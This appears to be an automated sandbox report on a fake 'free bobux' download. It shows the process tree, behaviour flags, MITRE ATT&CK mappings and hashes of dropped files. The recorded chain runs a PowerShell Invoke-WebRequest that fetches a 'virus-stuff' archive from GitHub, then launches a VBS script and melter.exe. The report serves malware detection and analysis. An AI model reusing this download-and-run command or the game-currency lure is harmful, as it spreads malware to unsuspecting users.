C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5012

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1060

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1656

C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe
"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
1⤵
PID:244

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1629.tmp\162A.tmp\162B.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
2⤵
PID:5100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:848

C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
3⤵
- Delays execution with timeout.exe
PID:2400

C:\Windows\system32\timeout.exe
timeout /t 20 /nobreak
3⤵
- Delays execution with timeout.exe
PID:1732

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\robux2\virus-stuff-main\hamburger.vbs"
1⤵
PID:4244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\free bobux.bat" "
1⤵
PID:4060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
2⤵
- Delays execution with timeout.exe
PID:696

C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe
"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
1⤵
PID:3340

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E31E.tmp\E31F.tmp\E320.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
2⤵
PID:4568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364

C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
3⤵
- Delays execution with timeout.exe
PID:432

C:\Users\Admin\Downloads\robux2\virus-stuff-main\melter.exe
"C:\Users\Admin\Downloads\robux2\virus-stuff-main\melter.exe"
1⤵
PID:2288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
1ac52e2503cc26baee4322f02f5b8d9c

SHA1
38e0cee911f5f2a24888a64780ffdf6fa72207c8

SHA256
f65058c6f1a745b37a64d4c97a8e8ee940210273130cec97a67f568088b5d4d4

SHA512
7670d606bc5197ecb7db3ddaecd6f74a80e6decae92b94e0e8145a7f463fa099058e89f9dfa1c45b9197c36e5e21994698186a2ec970bbdb0937fe28ca46a834

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
b2a1398f937474c51a48b347387ee36a

SHA1
922a8567f09e68a04233e84e5919043034635949

SHA256
2dc0bf08246ddd5a32288c895d676017578d792349ca437b1b36e7b2f0ade6d6

SHA512
4a660c0549f7a850e07d8d36dab33121af02a7bd7e9b2f0137930b4c8cd89b6c5630e408f882684e6935dcb0d5cb5e01a854950eeda252a4881458cafcc7ef7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020
Filesize
19KB

MD5
76a3f1e9a452564e0f8dce6c0ee111e8

SHA1
11c3d925cbc1a52d53584fd8606f8f713aa59114

SHA256
381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c

SHA512
a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021
Filesize
62KB

MD5
c3c0eb5e044497577bec91b5970f6d30

SHA1
d833f81cf21f68d43ba64a6c28892945adc317a6

SHA256
eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb

SHA512
83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022
Filesize
69KB

MD5
aac57f6f587f163486628b8860aa3637

SHA1
b1b51e14672caae2361f0e2c54b72d1107cfce54

SHA256
0cda72f2d9b6f196897f58d5de1fe1b43424ce55701eac625e591a0fd4ce7486

SHA512
0622796aab85764434e30cbe78b4e80e129443744dd13bc376f7a124ed04863c86bb1dcd5222bb1814f6599accbd45c9ee2b983da6c461b68670ae59141a6c1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023
Filesize
39KB

MD5
8facf4d1ac6ff2520d3f9536ec0ba688

SHA1
05a661afe1d0f83e9566498cb4b895f1c90beae7

SHA256
a7d8fbd8a9794a97d9ea3752e450a700c2e295a681b4fa7a21affedc4fdb1a9c

SHA512
2cf271954eae3bc8766c3e19215732ee46591cbc3492b24d96cd26376be64dedb711c5d4962377b559b37c097aa267992ef380ad02bd5706435679076805a1d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024
Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000025
Filesize
88KB

MD5
b38fbbd0b5c8e8b4452b33d6f85df7dc

SHA1
386ba241790252df01a6a028b3238de2f995a559

SHA256
b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

SHA512
546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026
Filesize
1.2MB

MD5
be529a907c265364aea60b32d2a6b43f

SHA1
4e36681dc58aaaa130238083d0aa43d4604019e8

SHA256
1790bffabda47de3ac63c09728874fec01d03bd240361e81dbef964f8ed179bd

SHA512
37e65201a514127811d0f92dce4ca096401af92b4c90441d1e0673c1829cdf5d47f513a63f8ee1593987ac3dd542f197654423b0fe24d50aea4794001356004b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000039
Filesize
24KB

MD5
dffae597264123f497897e41c5769902

SHA1
cdf8614011681c3bb32a683b9b47639e73fd9667

SHA256
f6402c96a60f368920ba4fa44b6e0e6607d763d9e1ab2be04c7518cce9058a26

SHA512
30e31a2061d1d6aa7219929ad32b5ac8b7e87c31de55fbff0cec5bdeef1148c223ee6a5aea066950fd7107a50fcc91bbf66bf477af00c93a1822ce8b645072b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
216B

MD5
a0c6de30734ae8e2e6d932ff2c4ab04f

SHA1
aa865815798e0e8b31e5dfed77db1b9fa2ff65e7

SHA256
263704c43d75b897f557bb4c151080fd17be4a283f3f0dc5d3c73f48a848878c

SHA512
1d47cf1e69eec9a0fa79f05cc0db87765e1e89fb2d919c62e8729ec55fe1f80d29398945188a533949eded1e9b552d2a6168e2c443a412d8fcffd269a9b6ae46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
5KB

MD5
cf4ad53197a4b18070d8e5a272d9ca77

SHA1
611107e4dc1ff0930548d1cdf3c28d87d20d5104

SHA256
297511063ee5c467c77cca3e5a8ae9d8b92484340f5daa217043ee60bcd7a0bd

SHA512
3e089fa42a0b8310943533efd10bffcf54a86eddf8f27ff1fdf25b7b5ee25115a286ca0c040ef5dbe2ccf1c5902f9e019a1044609c74785fc56d3301af526ed7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
5KB

MD5
8c3ff63cf1d05a71de9143c255db4338

SHA1
1dd07548a3cc2199925c25747bd6db18909ebce6

SHA256
36d1a2db5e9ae4c0775855261ea8222831f2594117b9cc7c5e9266dda676c13e

SHA512
8432b774abdea01de334187e5300cf5b98ad693d60f83b689a03d5a05c78f5f95273e8cd6c17fcdf7bdd8f07dec48a802f3e08d2272fc443f01a330290642de1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
3KB

MD5
db271a549e1a6b4a30c11b500e7b9894

SHA1
25d05584372d7b33a7d69d6fc3f52b6f213eef6c

SHA256
34d061447e8542277f8c440b949cdf957731b2e4dba146798067d5ce35e7e450

SHA512
18a78b36f34a01f9c6a7d17bcf32dda06e43e0d91a7a987ee1c379794d9657889f2be4a7e9002a411e48c1a01ba1566152cb92afb9502c7bc13633997032c656

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
4KB

MD5
750c4bc9a7460d8e6525d6b93ec62d0c

SHA1
dda6bfe319f41f0cee0702793dce76b1aab71a46

SHA256
f5a8f2bb8e9eeb5ecce1871b38c2a978b0c01bf79f66db677c149ba9448ef4a7

SHA512
59b306d0e99bc20146f0d4e71b75b5adc2d88eb87c5692b971f8c63ec6c5d2cc7dc9f2b9acf591b615890a8a836e30fde61cced6b2453841e15339943c2bfd60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
4KB

MD5
5a80119649d49969bf10bd342b57cfd4

SHA1
fc916fc0dfa08c4495c052c3175681b26f2c544c

SHA256
897f8d1021a6c2c4a56d37bc9c27b420934ccc297a3ee52e40117ed85152da76

SHA512
5212a8d74a0434a7c994a4f325cca0c3e35ea088ab37191e63e0490a971025d4a089cd065fd61ca57ce219e6e47269ce926207eb55bd7d20845c2c697aeaddf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
560d1b63c30779701e7828a18e55fffa

SHA1
98dc0a8cda92d0f952bd9f6d9c2d04bf6c7495c1

SHA256
e3ae202470711caea14349a24bf6961a5b211ff988d3d045da8d8def8b7e5cd5

SHA512
21e434039b8b9f4e591e8f858c31c730764cff8f4b2d93fb9339ed840906acc30811fd55cdde3b598b128050773d8373a8ca8a294e92a694d0c4ee641408eb2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
693bcbe0b217a96be0e1f97932425f4a

SHA1
d93fea79509e6e5725df8ba78e6df25f8d8321a3

SHA256
95e162213a6dc3a38c0bcfd585b875bf5f296c1cdfcc4712a7a0104aaf4821cf

SHA512
6d80a4fe3916a5847d59ed30652e7a3b064854b5c163bf01fd0e9f0c6558bad28204721fe40e76365883b41e2ba1176f8dae9f30d62625ee92aef3dbbf1c8206

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
f151414082750e3853d86c691a429905

SHA1
53f5ec8fc5ad55ab5b5426e268c1ba5ff779d0ba

SHA256
3a930f84eb5bb2cbcfa87e5032b6e3e0733a92f5a5159223c1833eea0218cb35

SHA512
9e77c394753e9282ab4a29954e162a1a238a6228e640aab0f62033c3f8d7ca468b0606fdfffec1d8bbad269dcfc6b35091c24d436b3646201552e0be67311574

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
8KB

MD5
2f068469c96c2576ec8fc576f57ecc3d

SHA1
6fd0dad1304d7bc52fefb1bc986d284a48a2ccc2

SHA256
fb7f06cc2814affe2e6221d2c866654621772f9861376ef89ac8f51b80cc9122

SHA512
82c78309208cad13760c5a6d93ccb4dbc4c4551d5a66bd29c7cd4f842fef336bcae2ccd4e37b83303a46cf7d6d7debe8c2e7ea5afc48924d35cb6966b597b739

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
8KB

MD5
be4e987548d2722891946f488769e20b

SHA1
efc5e74e372cb770c98b0a6f05f7cd4279a7426c

SHA256
19b290675fe1cebe938e09c764247738562e6fbde79c3951b6a996c8fe419a0b

SHA512
189fdacab66461856ce28101e1561d77618663d9bb13804cd73a206b94aa559c270262529c54df7cfdcb3fc76bf7802b6c367664c6034b688f2792492b6282ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
87c865a258213f6014d966b7c4fa7dff

SHA1
aafd3946671c094807e451c1a305e255e9ee0d04

SHA256
14cc30e444bf421efda96f86b14f5e13418deb104c6e6138076382426b0a496b

SHA512
dc9fda2c36512962bd7baccd8f13eda84aa188d18bf441882e67109a2059aa3315b0f0d2c07ae74f04ea671642a25b2c0c38621607d2584223e5984f3abd4c6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
264f2246e1ba5912230f7895da1483c4

SHA1
adf7aeac1f9b8a36ee92be11652a774731d2a3a6

SHA256
ffa653b94bb01822b7e46a90e597ca5eb4e8b512fe7fbafd24d23b1521287967

SHA512
d1ae4f8f92c3d760254369fdbb61aa5a4025d5e0cee07c2e3737d81126b2c077030e70eb875f3df5dd1e7c22f1d093d629c28cc3fe9c01d2bd1e7b88574893c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
a8ade2025f5b099b395dabdfdd426ace

SHA1
80daf0b31b243f72be48a747a55e6a3c09d880e4

SHA256
e3286ffc07b72f1d300d3b29e27e5c644bcd7362d32ec88675891fa1aff05172

SHA512
416dcef467dad8f28cebd6d6b729e1f4593a0c1a65261c40ffdc04c27d10054d535eb45b71d2096c41f667bc203982f5d924095a6e2bc399e1f6b322e335716b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize
26B

MD5
2892eee3e20e19a9ba77be6913508a54

SHA1
7c4ef82faa28393c739c517d706ac6919a8ffc49

SHA256
4f110831bb434c728a6895190323d159df6d531be8c4bb7109864eeb7c989ff2

SHA512
b13a336db33299ab3405e13811e3ed9e5a18542e5d835f2b7130a6ff4c22f74272002fc43e7d9f94ac3aa6a4d53518f87f25d90c29e0d286b6470667ea9336ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5841f6.TMP
Filesize
90B

MD5
9c4aa40debb65e1ccabc09428f157c4e

SHA1
49d9e6bb8fff5389039857b16e2dde4680bbcfd8

SHA256
b57f4b605634e62ab698e030596f7448564ac0834cca4a12c7a69e347caf3d31

SHA512
83863c75c0c7dbe82959130ce28eb0954b20e9bca54d45885801654bd7ef23a7df8bbecab9be5771ba3b028b57218f8256dbad28ee93a52fe736d13c7f4e2b95

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
372B

MD5
f3bdf2d755c9d127df9098ef2601e890

SHA1
7be92b997b7e4028597d4722af4bc609b8d52268

SHA256
56b00e9e699f5bfa03f4b4e5d8a2341c162b8ed92cdab9ffa8db12c8ec224651

SHA512
e07ab3241f9582425d1a6ae31bc609267844b45e08b935376d067f06c430414f11b713b1fed79e4ab8fd43dac41b3a8ce0e5fdcf998259eec36d0d4887f4ea1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
e50f64a6392f1aca659ae5d7da647418

SHA1
0b3c13f044d1671e8aa631093bcfe026a7e0e59d

SHA256
0028d2aeca99fd8b71f399cacebda394e87bcd02b838cfab4fbade84083c3f23

SHA512
6dc4bd215ae129b34bfde202dd94bd7e0abd53b8907804dc42e37ce941e3fe4d326662c0aff190b81b6fa1a7d3acb710dca3597b4ed582989ed611a1ee5e9c7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
706B

MD5
34dd2e5417b812018739c8ac820778df

SHA1
2bc589afee12bb5058c32787fd60a622ed0f54ca

SHA256
636b6139311a172d824ac38397aad1314a87df040f280b84a8cacb856db70d3e

SHA512
670e464c4cea49a6fc9fd329f9ad6150d9dd916bae026dc0b967229995f3ffb29497648e7c71cbd8c6cfea1ed1706e9d20479e132d1711ed2881a5f97d572b9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
e4391bbdd0589b9cbe7e7175e51c9b26

SHA1
697d447ba840e5e0f86622cc23c29a080507fc54

SHA256
1964d7e7a07ca7b207973d4a6ac734152a275c809773663f274a6c53bd8c2ffe

SHA512
711633d09bf4adbea9ff597ee9d93943cacd1a6c78bbcf88034e7bf0413de912c08f59434a897e80519456783cc0adc5503164a2bde4c68acc91b481edc1c4f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
2KB

MD5
4e66590604e5cb847cd6ba3cf11d1fc6

SHA1
a4adee7ce160978c634939bfb31f91365e0d7cb6

SHA256
c303fd7df91ffbbc3d40e347cb49a160d29b0bb648adfe03a1c405e1b799da75

SHA512
b7f5b9cbc9f2802c9322132afdce7ee60d4ef9be136fa36bc5d156a2740ea30c5c97bffddcaf473a9c1025f6f28e80dd8b4857104ba3d3f5a6025de432557280

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
204B

MD5
d758c3cfc3c7a7dd7a7d4e2bced4d5be

SHA1
4f2878d1eefacd443595dce1e828db0f5fea574e

SHA256
9029b85a19389eb2a3c5404b23bfb23cee054855c8bb716c28e54d27f44a2498

SHA512
64e35fef77295e41b93ed987269249e5bae12528982422c427c1e4f3741f32ca27521482b78dc6aa4f6c55da5da80e9d8aa7a2e8e7064beac3aba29e9a0a5863

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
e132d87483e6efc8c9b3ede3f2b0d7fe

SHA1
67beb3c23b6651a2191c553c832adefca1a047eb

SHA256
258d0ae62c74cd974c2f761988f09e77e92a0eb619829fca830cd08c5980d318

SHA512
68d64af92f2db657a56bd1ba8c1df07955ca4df638e258daeb900a63b0f8ed9e1b72ce1a72721c96722977afdc62947ea72dcb217d7c2df410963e08848dc725

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
ebd32d9ecba0b5570ee8754abc531313

SHA1
bfe8656c5876a080922ac8bb67e63d28b1ca91a4

SHA256
01c379e91f491d86aba97b02cf9eb7870555c09f4e4a2c3386dd61fed202907e

SHA512
e0bbddbf3a864aa1cca22e1e5dadb0df78bf04559ae5ee02204a6c2a99979e0e6d8487bc4a14892c1b0d2bd1325965e065d75f5878f6ca5814440a0d32a075e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
372B

MD5
41ce7032791daf1c65335a5f7c7cdc88

SHA1
4ec0591fb6979b101f15bdfcd850bcaf6ca05dba

SHA256
080bb959182ccae88a1f3f576d2287f5eedebaeb7970fe8d50c42141750a985c

SHA512
9dd4b39223572499dfbe63c2c563dd8932128b290db08cba34b3ac5ae1b3bf021b241eb66f309b4b30b932c849efefa007a37e91e10c5d334637133955a3b504

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58319a.TMP
Filesize
204B

MD5
66ef69e76de6be742e5c559d48ceaf84

SHA1
557c9ae1d34ec64109ed2d18346b668d186bfad2

SHA256
ae5078564dc241f06887a074bb3fb3c700c134df474ff0cbec883202170bcc24

SHA512
42282654a276e274d5b09be00c70fe1cf77194dd697223691cd0369259adb11b31850e6e06acff3ad59b7c37468d06a2b7eb476db07541b840f513298ce55cb7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
7137ce46c6dac0e6717ad879d4eda0be

SHA1
7422e497abdc50e6628ef9b7244b6fe8ba2f5ffc

SHA256
61fc8e2e4c03d297c002f222e115abcb3b4e99228d65c17d1cf68482b530d32a

SHA512
1e857c80bae3db4b11429cff33b5e21a8a12ab4c23515bdc0824f7f9f2e01a7966ba971e8c43bbaa3ac7f7331a322d2e3d6d99eca7629b84c198d7c40c22b3db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
d4dfdc34ab4a8c8de780ea0d3d12d982

SHA1
26b8963266ad570efa522b4491ef7e5b318943d6

SHA256
ee1f6efa97d9f3eb569127619dcc9a5f2cd777c5732130d559ed359a87df8424

SHA512
10aab2c5c8c38dbde5d7347dfad0b627d3b94760dd31b81cdc857b278331c909ec0ebeae09414f52c2ca1bff00bd26a97306e3bd883f24afd99f6f3fe3aa1c94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
bdd4d1de2b02c4596baa06dc7b1ef29d

SHA1
c7e62adf3bd3d276c02a3c9f2248fa301c8a6863

SHA256
06a51871752ea192ad985c27e9f76845cd53eeefcefe1e3c18bd4e436ca170ea

SHA512
268136cb82f91f4450db79b2a7f54ed0afa0895e47f81fd47b45d803d72774a446bd316a5b01201474833329eadafd923cfe8f4733fedfef9c5b5e06da325860

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a5c074e56305e761d7cbc42993300e1c

SHA1
39b2e23ba5c56b4f332b3607df056d8df23555bf

SHA256
e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

SHA512
c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e5fb209b388599620c867ddcf2c28810

SHA1
027ef6d573236a1886094fc8187d6e62db5240f4

SHA256
a79358bb9e3f0e0194ed401bfe51bf23e6fa33a623c0cc76f5fd733cad2ecbde

SHA512
27615d70ed87f5413b2c7f8b4427de4d64a5af7f33b5872aae45efc9d33a436c5e2f1565edf28df109438b05f45b48c6745b31999151af9eec3d51bc0689143d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ecfad053723f0fcfa5277e7f671671ac

SHA1
5cae19229a7a728cc4906ef4d7dedf518922cbad

SHA256
04b65887a9f0eefb8ec5b26bf1db84cd2296ca1a567c02ebaab1e3e8b660db6a

SHA512
319840d9b514b3f43e79cf3fe18b87e3e3478eceed8a7c27253f4a864e43fda2c49231284219e86bd4975b61c971fc60856eed8f7314e398b88798feeef71554

Download Submit
C:\Users\Admin\AppData\Local\Temp\6EFC.tmp\6EFD.tmp\6EFE.bat
Filesize
867B

MD5
addedb06062eef1e06beb01c81ede139

SHA1
fe92bda282254358c287991cd4020f393a3393fe

SHA256
98c6a0254f64be056923053dff9619232013371b7326bd539d5e1717d7844c3f

SHA512
a892597d9fed1cf6fb34d810ac3385a0e3c2ab03ecb09434eb2252d2cedc3f11c018a0d077a670113a18dcabeddb0f50fc6eda33b7e5ae078bf99d13e8874123

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0xsh3sqn.bp0.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize
12KB

MD5
9c0827c118199066a47d6ab57033f12d

SHA1
ba6d52e224665f7d36c1320b3881387ded03c403

SHA256
6ad868e164c5aa726417442d72480d1c00dfc2bf06e7e235e9948059ef773293

SHA512
02e6107f7f0163b0c09ce1a3302318fa8aa6dd7364fc8d9efc1ccb426115bc22575cde44d1c609452a1a9585eb3eb32b1685ebe9db7bddb3f548f95046ac6baa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize
10KB

MD5
e105ded672a4fae68fe97da55831eaba

SHA1
4e092e88b35cf997a17d11229701f7a3b493e904

SHA256
4114a2f76c11cb00a1ed12bce3982f648dc8b030fa294bd6b49b40611bd244c9

SHA512
cb9a72956b01ebf98f62d3ec3a821bae8bfb959ed8b96f5b479aa9217dae97bbf601a8ca987dc0da07ed0c6a4383a74b3462d2a236faa297b7bda33e0f286a29

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 74026.crdownload
Filesize
89KB

MD5
86d68c9cdc087c76e48a453978b63b7c

SHA1
b8a684a8f125ceb86739ff6438d283dbafda714a

SHA256
df51babc1547a461656eaef01b873a91afcf61851b6f5ef06977e1c33e1b5f32

SHA512
dd627f071d994999172048f882ba61407461633634fdb2a3f2b8e6abff6324cc0d78682b5adc4aa4083e5baa1c981687f5c516d9e075eb00dfb58364cee1db04

Download Submit
C:\Users\Admin\Downloads\free-bobux-main.zip
Filesize
283KB

MD5
6238605d9b602a6cb44a53d6dc7ca40e

SHA1
429f7366136296dc67b41e05f9877ed762c54b73

SHA256
e315b421cb9bc6ae65fdeea180f5b12d2c4cf4117bf5872381bb20a1b28dbff9

SHA512
a8c5923c2e203cc2076030af51e4aa25f4c94b595a7f7d15c00c1c4e0eb91ae7734db9c3d59584642d18f5d63a8aecfadb06803a990ec51b668d3d93a079b1a7

Download Submit
\??\pipe\LOCAL\crashpad_2284_SOCUTCOTIYXXHION
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/556-990-0x0000020CB4660000-0x0000020CB4682000-memory.dmp

Filesize
136KB

Download